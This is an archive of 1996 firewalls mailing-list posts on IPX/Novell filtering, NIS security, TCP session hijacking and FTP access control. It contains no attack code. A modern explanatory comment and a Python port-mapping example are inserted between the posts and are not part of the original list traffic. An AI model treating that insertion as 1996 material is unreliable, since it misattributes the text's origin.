From firewalls-owner Thu Feb 1 00:38:26 1996
Date: Thu, 01 Feb 96 08:33:08 GMT
From: "MCARDLE MARK"
Message-Id: <9601018231.AA823192503@dis.n-i.nhs.uk>
To: firewalls@greatcircle.com

Does anyone know of a version of screend that runs on either DGUX, AIX, HPUX or LINUX? We are currently using a Digital Firewall and are looking at the DGUX DSO containment firewall.

Thanks in advance

Mark McArdle
mmcardle@dis.n-i.nhs.uk
http://www.dis.n-i.nhs.uk

From firewalls-owner Thu Feb 1 01:53:37 1996
Message-Id: <31108C2A.210F@ensi.rnrt.tn>
Date: Thu, 01 Feb 1996 10:47:22 +0100
From: Mondher Maddouri
Organization: E.N.S.I, Ecole Nationale des Sciences de l'Informatiques
To: tunisia@univ-lyon1.fr, firewalls@GreatCircle.COM
Subject: Card driver, thanks

Hi everyone, thank you very much for your help about the card drivers under Unix. In particular, I thank Guettari for his helpful answer.

Sincerely,
mondher

From firewalls-owner Thu Feb 1 02:09:08 1996
Message-Id: <31108D25.723D@ensi.rnrt.tn>
Date: Thu, 01 Feb 1996 10:51:33 +0100
From: Mondher Maddouri
Organization: E.N.S.I, Ecole Nationale des Sciences de l'Informatiques
To: firewalls@GreatCircle.COM, tunisia@univ-lyon1.fr
Subject: Securing an anonymous ftp access

Hi everyone, can any of you send me information about how I can install an ftp server, and how I can control access to this ftp server, in a way that I can authorize only some addresses or some users to access it?

Thanks much,
maddouri@ensi.rnrt.tn

From firewalls-owner Thu Feb 1 02:39:33 1996
From: jsanchez@esegi.es (Julio Sanchez)
Newsgroups: gmv.gw-lists.firewalls
Subject: Re: Sequence Number Attacks
Date: 1 Feb 1996 10:32:33 GMT
Organization: SGI Soluciones Globales Internet
Message-Id: <4eq4s1$ruv@melmac.gmv.es>
References: <199601201904.OAA26032@goffer.cb.att.com>

C Matthew Curtin (cmcurtin@goffer.cb.att.com) wrote:
:
: Now, say I'm a Bad Guy on the network somewhere between you and your
: destination. Using the TCP sequence number attack, I fool your
: destination into thinking that I'm you, and I take over your
: session. The end result is that you are dropped, and I have simply
: taken over from where you left off.

The TCP sequence number attack mentioned was about TCP sequence number *guessing*. If you are in between, you know the sequence numbers. What you describe is possible, but it is not the kind of attack being described. It is usually called session hijacking or TCP splicing.

All the best,

--
Julio Sanchez, SGI Soluciones Globales Internet
Tel/Fax: 91/804 14 05   WWW: http://www.esegi.es
jsanchez@esegi.es   jsanchez@gmv.es
PGP Key fingerprint = E5 29 93 6F 41 4E 00 E2 90 11 A1 8C 72 D0 DE 71

From firewalls-owner Thu Feb 1 02:39:36 1996
To: firewalls@bb.hks.net
Date: 1 Feb 1996 04:40:25 -0500
From: bressen@hks.net (Andrew K. Bressen)
Message-ID: <4eq1q9$q58@bb.hks.net>
Organization: HKS.net
References: <199601170108.RAA03101@phoenix>
Subject: Re: Internet-access from Novell

I'm confronting the same issue with a client right now, only with an added problem... more on that; first, here is a summary of what I've seen mentioned here and elsewhere, plus pointers to the PC Magazine reviews of same:

PC Magazine overview article
  http://www.zdnet.com/~pcmag/1413/pcm00155.htm

Internet Junction (now Cisco) Passport
  http://www.ij.com/
  http://www.zdnet.com/~pcmag/1413/pcm00156.htm   review
  runs on an NT box

Novix Firefox
  http://www.novix.com/
  http://www.zdnet.com/~pcmag/1413/pcm00159.htm
  NLM

Performance Technology Instant Internet
  http://www.perftech.com/
  http://www.zdnet.com/~pcmag/1413/pcm00157.htm
  comes with hardware

Internetware IWare Connect
  http://www.internetware.com/
  http://www.zdnet.com/~pcmag/1413/pcm00158.htm
  NLM

Frontier Tech CyberJunction
  http://www.frontiertech.com/products/cyjunctn.htm
  runs on an NT box
  (I had no problem finding info on this site...)

Anybody got any others? Please cc me on replies.

From firewalls-owner Thu Feb 1 02:53:24 1996
To: firewalls@bb.hks.net
Date: 1 Feb 1996 05:31:32 -0500
From: bressen@hks.net (Andrew K. Bressen)
Message-ID: <4eq4q4$qde@bb.hks.net>
Organization: HKS.net
References: <199601170108.RAA03101@phoenix>
Subject: Re: Internet-access from Novell

Here's the worse problem I mentioned.

I've grepped over 9000 archived articles of this group and found no mention of how to firewall Novell boxes from each other.

I have a client in the financial industry who has a market data feed from a provider. The market data feed is provided by a Novell server on a leased line, with special client software for the users. How do I protect said client from, say, a disgruntled mailroom employee at the provider end, bent on hacking on the client's network?

I'm not even sure what Novell uses in lieu of tcp/udp ports; pointers to IPX/SPX docs, and the Novell equivalent of an /etc/services file would be most appreciated.

Are there any IPX/SPX packet filters available?
Are there any IPX proxy server firewalls available?
CJC from Novell mentioned their existence, but gave little other info.

Of course I'll start by recommending that the market data feed box go onto its own ethernet segment, and that IP traffic is not forwarded on or off of that segment.

From firewalls-owner Thu Feb 1 03:09:39 1996
To: firewalls@bb.hks.net
Date: 1 Feb 1996 05:15:08 -0500
From: bressen@hks.net (Andrew K. Bressen)
Message-ID: <4eq3rc$qal@bb.hks.net>
Organization: HKS.net
References: <199601170108.RAA03101@phoenix>
Subject: Re: Internet-access from Novell

My questions about the IPX-IP gateway products I just posted about (Novix, Internet Junction Passport, Cyberjunction, Instant Internet, and Iware Connect) are as follows:

 * given that they have their own winsocks, do they work with Windows 95?

 * how about with Windows NT? given

                          IP2IPX
     ISP----router----|          |-------Novell Clients

   I believe that NT can be a Novell client as well as a LanManager client; if one is running NT with IP turned off, can an alternate winsock be used?

 * I assume that the way these suckers work is to register each outbound TCP or UDP connection in some way and, acting as a proxy, assign a port number that will map to the specific PC. For example, I'm on Novell node foo, and I telnet out, and the IP2IPX gateway assigns me port 9073 and knows that packets for that port get rehashed and sent to my PC's Winsock.

   How do they deal with UDP? If, for example, I wanted to NFS mount some internet archives on my Novell PC inside the proxy gateway, how is it going to deal? How long are the port numbers reserved for? Unless they are registered permanently, which might well run one out of ports entirely for a large network, how can the stateless connections be dealt with?
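The scheme guessed at in the post above is ordinary port address translation, and the UDP and port-lifetime questions are answered by how the mapping table is aged. The following toy model is an added example, not code from any of the products named or from the poster: TCP entries are released on connection close, UDP entries expire on an idle timer, the pool can run out, and an inbound packet is only delivered to the node whose flow created the mapping. Class names, the port range and the 60 second timeout are assumptions.

```python
"""Toy model of the per-flow port-mapping table a proxying IPX-to-IP gateway
(or any port-address-translating device) keeps for outbound connections.
Added example: not the code of any product named in the thread; the class
names, the port range and the idle timeout are assumptions."""
import time

UDP_IDLE_TIMEOUT = 60.0   # assumed: seconds of silence before a UDP mapping is reclaimed


class ManualClock:
    """Settable clock so the expiry logic can be exercised without sleeping."""
    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now


class Mapping:
    def __init__(self, node, proto, remote, seen):
        self.node = node        # internal client (an IPX node, here just a label)
        self.proto = proto      # "tcp" or "udp"
        self.remote = remote    # (remote host, remote port) the flow goes to
        self.last_seen = seen


class PortMapper:
    def __init__(self, first_port, last_port, clock=time.monotonic):
        self.free = list(range(first_port, last_port + 1))  # unused gateway ports
        self.table = {}       # gateway port -> Mapping
        self.by_flow = {}     # (node, proto, remote) -> gateway port
        self.clock = clock

    def outbound(self, node, proto, remote):
        """Register a packet from an internal node to `remote`; return the gateway
        port it is sent from, or None when the pool is exhausted.  Further packets
        of the same flow reuse the same port."""
        key = (node, proto, remote)
        if key in self.by_flow:
            port = self.by_flow[key]
            self.table[port].last_seen = self.clock()
            return port
        self.expire_idle()            # reclaim quiet UDP mappings before giving up
        if not self.free:
            return None
        port = self.free.pop(0)
        self.table[port] = Mapping(node, proto, remote, self.clock())
        self.by_flow[key] = port
        return port

    def inbound(self, gw_port, src):
        """Map a packet arriving for gw_port back to the internal node.  A packet
        from a source the mapping was not created for is dropped (None), so an
        open mapping is not a door for arbitrary outside hosts."""
        m = self.table.get(gw_port)
        if m is None or m.remote != src:
            return None
        m.last_seen = self.clock()
        return m.node

    def close(self, node, proto, remote):
        """TCP teardown (FIN or RST seen): release the port immediately."""
        port = self.by_flow.pop((node, proto, remote), None)
        if port is not None:
            del self.table[port]
            self.free.append(port)

    def expire_idle(self):
        """UDP has no close handshake; reclaim mappings idle past the timeout."""
        now = self.clock()
        for port, m in list(self.table.items()):
            if m.proto == "udp" and now - m.last_seen > UDP_IDLE_TIMEOUT:
                del self.table[port]
                del self.by_flow[(m.node, m.proto, m.remote)]
                self.free.append(port)


def demo():
    """Walk through the scenario from the post: node foo telnets out, then NFS."""
    clock = ManualClock()
    pm = PortMapper(9073, 9074, clock=clock)            # deliberately tiny pool
    telnet = pm.outbound("foo", "tcp", ("telnet.example.net", 23))
    nfs = pm.outbound("foo", "udp", ("nfs.example.net", 2049))
    exhausted = pm.outbound("bar", "tcp", ("www.example.net", 80))  # None: pool empty
    pm.close("foo", "tcp", ("telnet.example.net", 23))
    reused = pm.outbound("bar", "tcp", ("www.example.net", 80))     # gets 9073 back
    clock.now = 120.0                                   # the NFS flow goes quiet
    pm.expire_idle()
    return telnet, nfs, exhausted, reused, sorted(pm.free)


if __name__ == "__main__":
    print(demo())
```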
From firewalls-owner Thu Feb 1 03:23:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA01957 for firewalls-outgoing; Thu, 1 Feb 1996 02:02:43 -0800 (PST) Received: from ismael.gmv.es ([193.127.51.205]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA01951 for ; Thu, 1 Feb 1996 02:02:23 -0800 (PST) Received: by ismael.gmv.es; id LAA04959; Thu, 1 Feb 1996 11:02:21 +0100 Received: from melmac.gmv.es(193.127.48.3) by ismael.gmv.es via smap (T3.1) id xma004955; Thu, 1 Feb 96 11:02:00 +0100 Received: by gmv.es (4.1/GMV-1.10) id AA28631; Thu, 1 Feb 96 11:01:25 +0100 Date: Thu, 1 Feb 96 11:01:25 +0100 Message-Id: <9602011001.AA28631@gmv.es> From: Julio Sanchez To: Doug.Hughes@Eng.Auburn.EDU Cc: jsanchez@esegi.es, firewalls@greatcircle.com In-Reply-To: (message from Doug Hughes on Wed, 31 Jan 1996 08:29:39 -0600) Subject: Re: how secure is NIS Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: Doug Hughes > Date: Wed, 31 Jan 1996 08:29:39 -0600 > Cc: firewalls@greatcircle.com > > I think you are confusing our firewall with our external router. As this > wasn't made clear in the original post, that is a natural mistake. My point > was that the University as a whole has an external router that has a block > as opposed to allow strategy by necessity. There are several protocols that > we can all agree deserve blocking (RPC, NFS, rexec, etc). However, making > an allow list would be huge and unwieldy (while blocking all else). > Our firewall is actually part of the engineering network and does serve > to protect us from other depts outside of engineering in a limited fashion. > I wouldn't call it a real firewall as it uses tcp_wrappers, some scanner > detection, and other IDS type tools, but it serves its purpose admirably. Good, so you already have one or more internal firewalls. 
That was actually the point I was making, that a firewall protecting a University network from the Internet is silly most of the time. But the point being made in the thread by others is that RPC, etc. are not really securable. And then my other implicit point was that the University network at large is not protected very strongly. This is actually very common in Universities and is not necessarily wrong in itself. Only that everyone must be aware of this and no unwarranted expectations should be raised by anyone. You cannot be very open (like your departments require) and very protected at the same time. > The ruleset on the external router is quite small, unfortunately, and > necessitates a block vs. allow strategy. That, as you probably know, requires you to know what is dangerous and we don't really know that. At most, we think we know what things don't seem to be dangerous. And some people in the list will immediately point out that I am being too optimistic :-) > The actual firewall machines are under our direct control and are > self-consistent and wholly configured by us. > We do not rely upon the external router to be a panacea, but just to do the > little things that an External router can be good at: > 1) preventing external TCP/IP spoofing attacks Good, but in an open environment as yours it is probably very easy to get to some internal machine maybe even through approved means (accounts for research partners, student accounts whose passwords circulate around, etc.) and as soon as they've got a stronghold inside, the router (or a more restrictive firewall for that matter) is going to be of little help. > 2) preventing source routing Good again, but see above. > 3) blocking agreed upon services I have already commented on this, but see that some services cannot easily be mapped to filterese (source/dest, address/port, etc.). You you might be blocking the services that you consider dangerous *and* can be filtered. Notice the emphasis on "and". 
So, your network at large is not really very secure and cannot probably be secured without major rethinking/restructuring and a lot of consensus. At least you already have some networks more protected so it seems you are more aware of the issues that I had thought at first (so I apologize for jumping so fast). The Spanish University I mentioned did not seem to be, so the depth of the damage is unknown. No one knows how deep they got, but the fact that disguised sniffers were found is not comforting. Since all I know about this intrusion is second hand and off-the-record, it might be pure invention. So those considering asking (some already have), please refrain, I cannot tell who they are unless they come forward. But it is worth some thinking even if it just were an hypothetical case (similar cases have been reported before anyway). All the best, -- Julio Sanchez, SGI Soluciones Globales Internet Tel/Fax: 91/804 14 05 WWW: http://www.esegi.es jsanchez@esegi.es jsanchez@gmv.es PGP Key fingerprint = E5 29 93 6F 41 4E 00 E2 90 11 A1 8C 72 D0 DE 71 From firewalls-owner Thu Feb 1 03:53:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA06508 for firewalls-outgoing; Thu, 1 Feb 1996 03:40:53 -0800 (PST) Received: from sentry.novo.dk (sentry.novo.dk [152.73.17.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA06502 for ; Thu, 1 Feb 1996 03:40:37 -0800 (PST) Received: from eagle.novo.dk by sentry.novo.dk; (5.65v3.0/1.1.8.2/28Sep94-0345PM) id AA11949; Thu, 1 Feb 1996 12:39:50 +0100 Received: by eagle.novo.dk; (5.65/1.1.8.2/23Dec94-0959AM) id AA14317; Thu, 1 Feb 1996 12:39:49 +0100 From: "Finn T Andersen" Message-Id: <9602011239.ZM14289@eagle.novo.dk> Date: Thu, 1 Feb 1996 12:39:49 +0100 X-Mailer: Z-Mail (3.2.0 06sep94) To: firewalls@greatcircle.com Subject: NIS+ Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There has been a lot of good 
information and suggestions about NIS recently, however, noone has mentioned anything about NIS+. I have heard that NIS+ should be a very secure system, but in fact I have never heard about anyone who was using it. Is it available, and on what platforms ? --- Finn Andersen -- Finn T Andersen +45 44 42 60 49 e-mail X.400 /c=dk/admd=dk400/prmd=novonordisk/s=fina Addr. Novo Nordisk A/S, Novo alle, 2880 Bagsvaerd DK From firewalls-owner Thu Feb 1 04:38:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA08862 for firewalls-outgoing; Thu, 1 Feb 1996 04:29:48 -0800 (PST) Received: from bb.hks.net (bb.hks.net [199.183.60.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id EAA08857 for ; Thu, 1 Feb 1996 04:29:43 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by bb.hks.net (8.7/8.7-hks1) with SMTP id HAA27466 for ; Thu, 1 Feb 1996 07:26:12 -0500 Received: from pferguso-pc (c1robo7.cisco.com [171.68.13.7]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id EAA12352; Thu, 1 Feb 1996 04:21:08 -0800 Message-Id: <199602011221.EAA12352@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 01 Feb 1996 07:21:46 -0500 To: bressen@hks.net (Andrew K. Bressen) From: Paul Ferguson Subject: Re: Internet-access from Novell Cc: firewalls@bb.hks.net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 05:31 AM 2/1/96 -0500, Andrew K. Bressen wrote: > >I'm not even sure what novell uses in lieu of tcp/udp ports; >pointers to IPX/SPX docs, and the Novell equivalent of >an /etc/services file would be most appreciated. > >Are there any IPX/SPX packet filters available? > Yes -- they're called routers. :-) - paul -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. 
e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Thu Feb 1 04:53:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA08845 for firewalls-outgoing; Thu, 1 Feb 1996 04:26:58 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA08831 for ; Thu, 1 Feb 1996 04:26:53 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) id EAA25480; Thu, 1 Feb 1996 04:23:19 -0800 Received: from bb.hks.net(199.183.60.11) by mycroft via smap (V1.3mjr) id sma025478; Thu Feb 1 04:22:39 1996 Received: from big486.ed-com.com (big486.ed-com.com [38.253.238.200]) by bb.hks.net (8.7/8.7-hks1) with SMTP id HAA27437 for ; Thu, 1 Feb 1996 07:19:26 -0500 Received: by big486.ed-com.com with Microsoft Exchange (IMC 4.1.611) id <01BAF076.CCE53310@big486.ed-com.com>; Thu, 1 Feb 1996 07:27:54 -0500 Message-ID: From: Ed Woodrick To: "firewalls@bb.hks.net" Subject: RE: Internet-access from Novell Date: Thu, 1 Feb 1996 07:27:52 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.1.611 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="---- =_NextPart_000_01BAF076.CCEB4D90" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. Contact your mail administrator for information about upgrading your reader to a version that supports MIME. ------ =_NextPart_000_01BAF076.CCEB4D90 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable I know that this is probably a radical answer, but what about using = Novel access permissions to restrict access to the data? I don't know = why you would want to go to the trouble of putting up firewalls when = just a simple permission change should work. 
It's a lot easier and I = expect a lot safer to perform security at the operating system level = than at the network level. Ed Woodrick ---------- From: bressen@hks.net[SMTP:bressen@hks.net] Sent: Thursday, February 01, 1996 5:31 AM To: firewalls@bb.hks.net Subject: Re: Internet-access from Novell Here's the worse problem I mentioned.=20 I've grepped over 9000 archived articles of this group and found no mention of how to firewall novell boxes from each other. I have a client in the financial industry who has a market data feed from a provider. The market data feed is provided by a novell server on a leased line, with special client software for the users. How do I protect said client from, say, a disgruntled mailroom employee at the provider end, bent on hacking on the clients network? I'm not even sure what novell uses in lieu of tcp/udp ports; pointers to IPX/SPX docs, and the Novell equivalent of=20 an /etc/services file would be most appreciated.=20 Are there any IPX/SPX packet filters available?=20 Are there any IPX proxy server firewalls available?=20 CJC from Novell mentioned their existence, but gave little other info.=20 Of course I'll start by recommending that the market data feed box go onto its own ethernet segment, and that IP traffic is=20 not forwarded on or off of that segment.=20 ------ =_NextPart_000_01BAF076.CCEB4D90-- From firewalls-owner Thu Feb 1 05:24:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA10396 for firewalls-outgoing; Thu, 1 Feb 1996 05:12:58 -0800 (PST) Received: from gwosi.telesc.gov.br (gwosi.telesc.gov.br [200.18.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA10293 for ; Thu, 1 Feb 1996 05:12:17 -0800 (PST) Received: by gwosi.telesc.gov.br (AIX 3.2/UCB 5.64/4.03) id AA28733; Thu, 1 Feb 1996 11:14:31 -0600 Date: Thu, 1 Feb 1996 11:08:35 -0600 (CST) From: Jane Ferreira Cunha Subject: What are MLS and TE? 
To: firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please, where can I find some explanation about MLS and TE? I've seen a lot of discussion about them, but so far I could understand it. Are they in a FAQ somewhere? TIA, Jane %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % % % Jane Ferreira Cunha % % Network Manager % % TELESC % % Florianopolis - SC - Brasil % % % % Tel. +55 48 231-2600 % % Fax +55 48 231-2611 % % e-mail : jane@telesc.gov.br % % % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% From firewalls-owner Thu Feb 1 05:38:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA10089 for firewalls-outgoing; Thu, 1 Feb 1996 05:08:17 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA10053 for ; Thu, 1 Feb 1996 05:08:08 -0800 (PST) Received: from pferguso-pc (c1robo7.cisco.com [171.68.13.7]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id FAA18975; Thu, 1 Feb 1996 05:06:30 -0800 Message-Id: <199602011306.FAA18975@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 01 Feb 1996 08:07:08 -0500 To: bressen@hks.net (Andrew K. Bressen) From: Paul Ferguson Subject: Re: Internet-access from Novell Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 05:15 AM 2/1/96 -0500, Andrew K. Bressen wrote: >My questions about the IPX-IP gateway products I just posted about >(Novix, Internet Junction Passport, Cyberjunction, Instant Internet, >and Iware Connect) are as follows: > > * given that they have their own winsocks, > do they work with windows95? > > * how about with windows NT? given > Internet Junction has support for both Win95 [client] and NT [server]. 
http://www.cisco.com/ - paul -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Thu Feb 1 05:56:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA11916 for firewalls-outgoing; Thu, 1 Feb 1996 05:39:54 -0800 (PST) Received: from bb.hks.net (bb.hks.net [199.183.60.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA11901 for ; Thu, 1 Feb 1996 05:39:46 -0800 (PST) Received: from bifrost.paladin.com (router.paladin.com [199.3.129.207]) by bb.hks.net (8.7/8.7-hks1) with SMTP id IAA27621 for ; Thu, 1 Feb 1996 08:36:14 -0500 Received: (from mail@localhost) by bifrost.paladin.com (8.6.12/8.6.9) id IAA01222; Thu, 1 Feb 1996 08:38:40 -0500 Received: from router.paladin.com(199.3.129.207) by bifrost.paladin.com via smap (V1.3) id sma001220; Thu Feb 1 08:38:37 1996 Date: Thu, 1 Feb 1996 08:38:36 -0500 (EST) From: Chris Woods To: "Andrew K. Bressen" cc: firewalls@bb.hks.net Subject: Re: Internet-access from Novell In-Reply-To: <4eq4q4$qde@bb.hks.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 1 Feb 1996, Andrew K. Bressen wrote: [...] > I've grepped over 9000 archived articles of this group > and found no mention of how to firewall novell boxes from [...] > Are there any IPX/SPX packet filters available? I'm about to embark on the same journey. Knowing little or nothing about Novell, I know it is going to be a long journey. However, I can say that I know that there are IPX packet filters available. Livingston's Portmaster IRX router has the ability to route IPX, as well as the ability to create IPX filter rules. See http://www.livingston.com. Sorry I couldn't be of more assistance... 
Chris Woods Systems Administrator cjwoods@paladin.com Paladin Computing Solutions 617-273-4226 http://www.paladin.com "Never underestimate the destructive power of a backhoe." -Brent Chapman From firewalls-owner Thu Feb 1 06:23:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA13621 for firewalls-outgoing; Thu, 1 Feb 1996 06:20:44 -0800 (PST) Received: from dns.eng.auburn.edu (dns.eng.auburn.edu [131.204.10.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA13614 for ; Thu, 1 Feb 1996 06:20:39 -0800 (PST) Received: from netman.eng.auburn.edu (netman.eng.auburn.edu [131.204.12.24]) by dns.eng.auburn.edu (v8.7.3/8.6.4) with ESMTP id IAA26943; Thu, 1 Feb 1996 08:19:41 -0600 (CST) From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id IAA25925; Thu, 1 Feb 1996 08:19:38 -0600 Date: Thu, 1 Feb 1996 08:19:38 -0600 Subject: Re: how secure is NIS To: jsanchez@gmv.es Cc: firewalls@greatcircle.com Message-Id: In-Reply-To: <9602011001.AA28631@gmv.es> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From: Julio Sanchez > >> From: Doug Hughes >> Date: Wed, 31 Jan 1996 08:29:39 -0600 >> Cc: firewalls@greatcircle.com >> >> I think you are confusing our firewall with our external router. As this >> wasn't made clear in the original post, that is a natural mistake. My point >> was that the University as a whole has an external router that has a block >> as opposed to allow strategy by necessity. There are several protocols that >> we can all agree deserve blocking (RPC, NFS, rexec, etc). However, making >> an allow list would be huge and unwieldy (while blocking all else). >> Our firewall is actually part of the engineering network and does serve >> to protect us from other depts outside of engineering in a limited fashion. 
>> I wouldn't call it a real firewall as it uses tcp_wrappers, some scanner >> detection, and other IDS type tools, but it serves its purpose admirably. > >Good, so you already have one or more internal firewalls. That was >actually the point I was making, that a firewall protecting a >University network from the Internet is silly most of the time. > >But the point being made in the thread by others is that RPC, etc. are >not really securable. > Hmm, I didn't hear that point, and I disagree. RPC and NIS are securable if you know what you are doing and you take the appropriate steps. I've outlined this before, and it's available on my WWW page, so I won't belabor the point here again. (Note: Secureable from outside attack, but less so from inside attack - an important distinction) >And then my other implicit point was that the University network at >large is not protected very strongly. This is actually very common in >Universities and is not necessarily wrong in itself. Only that >everyone must be aware of this and no unwarranted expectations should >be raised by anyone. You cannot be very open (like your departments >require) and very protected at the same time. > agreed. >> The ruleset on the external router is quite small, unfortunately, and >> necessitates a block vs. allow strategy. > >That, as you probably know, requires you to know what is dangerous and >we don't really know that. At most, we think we know what things don't >seem to be dangerous. And some people in the list will immediately >point out that I am being too optimistic :-) > The list of services that are known to be not used are blocked. (tcpmux, link, supdup, stuff like that). The list of known to be dangerous are blocked (NFS, RPC). Anything can be used dangerously. Somebody could setup a server on any port. Since arbitrary servers cannot be denied by fiat, this is one of those things we must live with and accept. 
>> The actual firewall machines are under our direct control and are >> self-consistent and wholly configured by us. >> We do not rely upon the external router to be a panacea, but just to do the >> little things that an External router can be good at: >> 1) preventing external TCP/IP spoofing attacks > >Good, but in an open environment as yours it is probably very easy to >get to some internal machine maybe even through approved means >(accounts for research partners, student accounts whose passwords >circulate around, etc.) and as soon as they've got a stronghold >inside, the router (or a more restrictive firewall for that matter) is >going to be of little help. > We have been trying to implement a one-time password or token based authentication mechanism for outsiders, but either the expense, or the hassle has made it impractical up till now. It's a matter that is constantly being revisited. If I had my druthers we would have secure telnet clients for access and one time passwords (not necessarily in combination, but possibly). Finding a multi-platform free secure telnet is an ongoing project. :) (STILL waiting on STel). tripwire, tcp_wrappers, rpcbind, modified logins, extensive logging, and a GUI IDS help us detect who's been 'bad or good'. We also watch patterns of students/profs logging in from external sites. I have an pseudo-AI perl tool that scans the wrappers logs and detects unusual patterns of user activity. It logs any connections outside the US, connections from multiple domains, and connections where RFC931 style identification does not match local ID, as well as users logging into a machine that they don't normally use. We've caught quite a few people doing password sharing this way. They don't do it again if they want to continue using their accounts. ;) > >So, your network at large is not really very secure and cannot >probably be secured without major rethinking/restructuring and a lot >of consensus. 
>

It depends on what you refer to as the network at large. The University
(except possibly COE and some other small pockets) network is largely
unsecured except for router filters. Yes, this is an undesirable truth. The
COE network has much more security. It has a fair balance of usability vs.
security. I am constantly trying to make it more secure without making it
less usable. That secure telnet client would go a long way to helping here.

> At least you already have some networks more protected so it seems you
> are more aware of the issues than I had thought at first (so I
> apologize for jumping so fast). The Spanish University I mentioned did
> not seem to be, so the depth of the damage is unknown. No one knows
> how deep they got, but the fact that disguised sniffers were found is
> not comforting. Since all I know about this intrusion is second hand
> and off-the-record, it might be pure invention. So those considering
> asking (some already have), please refrain, I cannot tell who they are
> unless they come forward. But it is worth some thinking even if it
> just were a hypothetical case (similar cases have been reported
> before anyway).
>

Luckily, with our current setup, it is easy to boot net-install workstations
should a population of them become corrupted. The installation software is
protected.
(It also helps to have fast 8mm tape drives in emergencies - luckily we
haven't had one in 2-3 years)

--
____________________________________________________________________________
Doug Hughes                                 Engineering Network Services
System/Net Admin                            Auburn University
doug@eng.auburn.edu
Pro is to Con as progress is to congress

From firewalls-owner Thu Feb 1 07:08:58 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA15699 for firewalls-outgoing; Thu, 1 Feb 1996 07:01:19 -0800 (PST)
Received: from gw3.att.com (gw4.att.com [204.179.186.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA15694 for ; Thu, 1 Feb 1996 07:01:16 -0800 (PST)
Received: from vodka.sse.att.com by ig4.att.att.com id AA26630; Thu, 1 Feb 96 09:53:13 EST
Message-Id: <9602011453.AA26630@ig4.att.att.com>
From: mdr@vodka.sse.att.com
Subject: Thanks for the helpful Intrusion Detection refs
To: firewalls@greatcircle.com
Date: Thu, 1 Feb 1996 10:02:52 -0500 (EST)
X-Mailer: ELM [version 2.4 PL23-upenn2.7]
Mime-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Thank you to all who wrote with research leads in intrusion detection. They
have proven most helpful and will probably keep me busy for a while as I try
to trace them all down.
I will send a copy of the responses I received to anyone who requests one by
private email

Mark Riggins
Secure Systems Engineering
AT&T Bell Labs

From firewalls-owner Thu Feb 1 07:24:20 1996
